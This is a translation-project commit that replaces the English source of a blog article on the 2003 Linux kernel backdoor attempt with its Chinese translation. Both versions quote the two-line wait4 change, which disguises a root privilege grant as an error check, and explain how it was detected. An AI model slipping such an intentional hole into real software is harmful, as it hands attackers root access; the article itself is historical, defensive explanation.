已翻译 by 小眼儿

Signed-off-by: tinyeyeser <tinyeyeser@gmail.com>

sources/The Linux Backdoor Attempt of 2003.md

@@ -1,46 +0,0 @@
-The Linux Backdoor Attempt of 2003
-==================================
-
-Josh [wrote][1] recently about a serious security bug that appeared in Debian Linux back in 2006, and whether it was really a backdoor inserted by the NSA. (He concluded that it probably was not.)
-
-Today I want to write about another [incident][2], in 2003, in which someone tried to backdoor the Linux kernel. This one was definitely an attempt to insert a backdoor. But we don’t know who it was that made the attempt—and we probably never will.
-
-Back in 2003 Linux used a system called BitKeeper to store the master copy of the Linux source code. If a developer wanted to propose a modification to the Linux code, they would submit their proposed change, and it would go through an organized approval process to decide whether the change would be accepted into the master code. Every change to the master code would come with a short explanation, which always included a pointer to the record of its approval.
-
-But some people didn’t like BitKeeper, so a second copy of the source code was kept so that developers could get the code via another code system called CVS. The CVS copy of the code was a direct clone of the primary BitKeeper copy.
-
-But on Nov. 5, 2003, Larry McVoy [noticed][3] that there was a code change in the CVS copy that did not have a pointer to a record of approval. Investigation showed that the change had never been approved and, stranger yet, that this change did not appear in the primary BitKeeper repository at all. Further investigation determined that someone had apparently broken in (electronically) to the CVS server and inserted this change.
-
-What did the change do? This is where it gets really interesting. The change modified the code of a Linux function called wait4, which a program could use to wait for something to happen. Specifically, it added these two lines of code:
-
-	if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
-        retval = -EINVAL;
-        
-[Exercise for readers who know the C programming language: What is unusual about this code? Answer appears below.]
-
-A casual reading by an expert would interpret this as innocuous error-checking code to make wait4 return an error code when wait4 was called in a certain way that was forbidden by the documentation. But a really careful expert reader would notice that, near the end of the first line, it said “= 0” rather than “== 0”. The normal thing to write in code like this is “== 0”, which tests whether the user ID of the currently running code (current->uid) is equal to zero, without modifying the user ID. But what actually appears is “= 0”, which has the effect of setting the user ID to zero.
-
-Setting the user ID to zero is a problem because user ID number zero is the “root” user, which is allowed to do absolutely anything it wants—to access all data, change the behavior of all code, and to compromise entirely the security of all parts of the system. So the effect of this code is to give root privileges to any piece of software that called wait4 in a particular way that is supposed to be invalid. In other words … it’s a classic backdoor.
-
-This is a very clever piece of work. It looks like innocuous error checking, but it’s really a back door. And it was slipped into the code outside the normal approval process, to avoid any possibility that the approval process would notice what was up.
-
-But the attempt didn’t work, because the Linux team was careful enough to notice that that this code was in the CVS repository without having gone through the normal approval process. Score one for Linux.
-
-Could this have been an NSA attack? Maybe. But there were many others who had the skill and motivation to carry out this attack. Unless somebody confesses, or a smoking-gun document turns up, we’ll never know.
-
----
-
-via: https://freedom-to-tinker.com/blog/felten/the-linux-backdoor-attempt-of-2003/
-
-本文由 [LCTT][] 原创翻译，[Linux中国][] 荣誉推出
-
-译者：[Mr小眼儿][] 校对：[校对者ID][]
-
-[LCTT]:https://github.com/LCTT/TranslateProject
-[Linux中国]:http://linux.cn/portal.php
-[Mr小眼儿]:http://linux.cn/space/14801
-[校对者ID]:http://linux.cn/space/校对者ID
-
-[1]:https://freedom-to-tinker.com/blog/kroll/software-transparency-debian-openssl-bug/
-[2]:https://lwn.net/Articles/57135/
-[3]:https://lwn.net/Articles/57137/

translated/The Linux Backdoor Attempt of 2003.md

@@ -0,0 +1,46 @@
+揭秘！—— 2003年Linux后门事件
+==================================
+
+最近Josh写了[一篇文章][1]，讲述2006年Debian Linux中出现的一系列安全bug，探讨了这些所谓bug是否是NSA植入的后门。（最后他作出结论：可能不是）
+
+今天我想讲述的是另外一个[事件][2]——2003年某些人试图在Linux内核中植入后门的故事。这次事件很明确，的确有人想植入后门，只是我们不知道此人是谁，而且，也许永远都不会知道了。
+
+时间回到2003年，当时Linux使用一套叫做BitKeeper的系统来存储Linux源代码的主拷贝。如果开发者想要提交一份针对源码的修改，就必须经过一套严格的审核过程，以决定这份修改是否能够合并进主拷贝。每个针对主拷贝的修改都必须附带一段说明，说明当中都包括了一个记录相应审核过程的链接。
+
+但是有些人不喜欢BitKeeper，于是这些开发者们就用另一套叫做CVS的系统，维护了一份Linux源代码的拷贝，这样他们就能随时按自己喜欢的方式获取Linux源代码了。CVS中的代码其实就是直接克隆了BitKeeper中的代码。
+
+但是在2003年11月5日的时候，Larry McVoy[发现][3]，CVS中的代码拷贝有一处改动并没有包含记录审核的链接。调查显示，这一处改动由陌生人添加，而且从未经过审核，不仅如此，在BitKeeper仓库的主拷贝中，这一处改动竟然压根就不存在。经过进一步调查后，可以明确，显然有人入侵了CVS的服务器并植入了此处改动。
+
+神秘人物究竟做了哪些改动？这才是真正有趣的地方。改动修改的是Linux中一个叫wait4的函数，程序可以使用该函数进行挂起操作，以等待某些事件的触发。神秘人物添加的，就是下面这两行代码：
+
+	if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
+        retval = -EINVAL;
+        
+[有C语言编程经验的人也许会问：这两行代码有什么特别的？请接着往下看]
+
+猛地一看，好像这两行代码就是一段正常的错误校验代码，当wait4函数被某种文档中禁止的方式调用时，wait4就返回一个错误代码。但是一个真正认真的程序猿立刻就会发现代码中的问题，注意看在第一行末尾，“= 0”应该是“== 0”才对。是的，“== 0”在这里才是判断当前运行代码的用户ID(current->uid)是否等于0，而“= 0”不但无法判断，反而修改了用户ID的值，即，将其值赋值为0。
+
+将用户ID设置为0，这是一个很严重的问题，因为ID为0的用户正是“root”，而root账户可以在系统中做任何事情，包括访问所有数据、修改任意代码的行为，能够危及到整个系统各个部分的安全。因此，这段代码的影响就是通过特殊手段使得任何调用wait4函数的软件都拥有了root权限。换句话说，这就是一个典型的后门。
+
+客观地说，这一招很漂亮。看起来就像是无关紧要的错误校验，但真是身份却是一个后门。而且它混在其他经过审核的代码中间，几乎规避了所有审核可能会注意到自己的可能性。
+
+但是它终究还是失败了，因为Linux小组有足够强的责任心，注意到了CVS仓库中的这段代码没有经过常规审核。Linux还是略胜一筹。
+
+这是NSA干的吗？只能说有可能。因为有太多拥有技术能力和动机的人有可能实施了此次攻击。那么，到底是谁呢？除非某些人主动承认，又或者发现新的确凿证据，否则，我们将永远不会知道。
+
+---
+
+via: https://freedom-to-tinker.com/blog/felten/the-linux-backdoor-attempt-of-2003/
+
+本文由 [LCTT][] 原创翻译，[Linux中国][] 荣誉推出
+
+译者：[Mr小眼儿][] 校对：[校对者ID][]
+
+[LCTT]:https://github.com/LCTT/TranslateProject
+[Linux中国]:http://linux.cn/portal.php
+[Mr小眼儿]:http://linux.cn/space/14801
+[校对者ID]:http://linux.cn/space/校对者ID
+
+[1]:https://freedom-to-tinker.com/blog/kroll/software-transparency-debian-openssl-bug/
+[2]:https://lwn.net/Articles/57135/
+[3]:https://lwn.net/Articles/57137/